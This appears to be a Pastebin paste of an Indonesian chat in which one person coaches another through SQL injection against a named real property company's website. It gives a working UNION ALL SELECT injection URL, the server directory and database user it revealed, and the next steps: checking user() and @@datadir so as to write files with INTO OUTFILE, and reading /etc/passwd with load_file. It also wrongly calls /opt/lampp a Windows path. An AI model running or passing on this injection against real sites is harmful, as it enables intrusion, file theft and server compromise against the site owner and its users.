Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- jangan ngetik ya liatin gue oce
- 1, dalam kasus ini http://www.birchwoodproperties.ca/blog.php?id=-16 +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11 -- -
- kita udah nemu inject point nya (2)
- C:\xampp\htdocs\birchwoodProperties\public_html\i\
- ini adalah directorynya, nah akan kita coba into outfile
- 'pnjp3_webpn'@'localhost' -> NO gak bisa into ourfile
- nah bang pertama tma harus user() terus @@datadir? lalu di gituin?
- enggak user()>>> buat cek usernya seandaunya root@localhost
- bisa saja di web dan di phpmyadmin sma user dan pw nya (root)
- maka bisa di into outfile kal @@datadir buat ngeliat data directorynya
- seandainya /var/lib/mysql >> berarti linux
- kalo c:/xampp/htdocs windows ini
- kalo /opt/lampp/ windows
- kalo D:/
- e: atau apapun datadirnya di awalin dengan satu huruf berarti
- winows oke
- oalah thank bang jd ngerti dah sekarangmah :)
- dan w mau copy dulu ini di pastebin buat jaga2 :V
- oke
- oke thank y :* oh iya cara lihat diretorynya gmn? kaalo bukan xamp?
- bisa pake load_file('/etc/passwd') wait
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement